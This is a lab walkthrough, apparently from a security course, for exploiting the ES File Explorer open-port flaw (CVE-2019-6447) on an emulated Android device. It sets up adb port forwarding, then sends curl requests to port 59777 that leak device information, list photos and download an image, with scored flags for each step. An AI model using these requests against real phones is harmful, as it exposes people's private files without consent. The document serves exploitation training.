Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447
It's very easy to see and exploit.
This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:
Drag the APK file onto your Android device and drop it there. Approve the application installation.
Click Agree, ALLOW, and "START NOW", as shown below.
You see information about your files, as shown below.
adb connect 172.16.123.154:5555
adb devices -l
You should see your Android device in the
"List of devices attached",
as shown below.
Find the Android SDK Location, outlined in green in the image below.
In a Terminal or Command Prompt, execute the commands below, replacing the path in the first command with the correct Android SDK Location on your system.
cd /Users/sambowne/Library/Android/sdk
cd platform-tools
./adb devices -l
You should see your Android device in the
"List of devices attached",
as shown below.
adb shell
netstat -pant 2>/dev/null | grep LISTEN
exit
You see a process
listening on port 59777,
as shown below.
If you are using a Mac or Linux machine, execute this command:
adb forward tcp:59777 tcp:59777
The response is to echo the port number
59777,
as shown below.
Windows Users
In a Command Prompt window, in the "platform-tools" directory, execute these commands:Leave that Command Prompt window open.
adb kill-server adb -a nodaemon server startOpen a new Command Prompt window. Change directory to the "platform-tools" directory, and execute these commands:
You should see the arbitrary address 0.0.0.0 LISTENING on port 59777.
adb forward tcp:59777 tcp:59777 netstat -an -p tcpInstall Windows Subsystem for Linux and Ubuntu, as explained here.
In a Ubuntu command prompt window, execute this command:
This shows the IP address of your Windows system.
cat /etc/resolv.confIn the Ubuntu command prompt window, execute this command, replacing 127.0.0.1 with the correct address for your Windows system:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
M 207.1: ftpPort (10 pts)
Execute this command to load information from the ES File Explorer process:You see information about your phone, as shown below.
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777Find the text covered by a green box in the image above. That's the flag.
In Android, on the right side, click the Webcam icon, colored pink in the image below.
Adjust the camera to access your host system's webcam, as shown below.
On the right side, in Device Manager, click the pencil icon to edit your emulated device, outlined in green in the image below.
At the bottom of the next window, click the "Show Advanced Settings" button.
In the next window, switch a Camera to Webcam0, outlined in green in the image below.
Now launch Android Studio, launch the emulator, open ES File Explorer, and configure port forwarding again.
Click Finish.
Start your emulator. Launch the Camera app and take a photo.
In a Terminal or Command Prompt, execute this command:
curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://127.0.0.1:59777
Find the path to your image in the output,
as shown below.
Execute this command, replacing the image path with the correct values for your system:
M 207.2 Image Path (10 pts extra)
The flag is covered by a green rectangle in the image below.
wget http://127.0.0.1:59777//XXXXXXX/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
The file downloads,
as shown below.
In the GUI, navigate to the file and double-click it to open it, as shown below.
Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.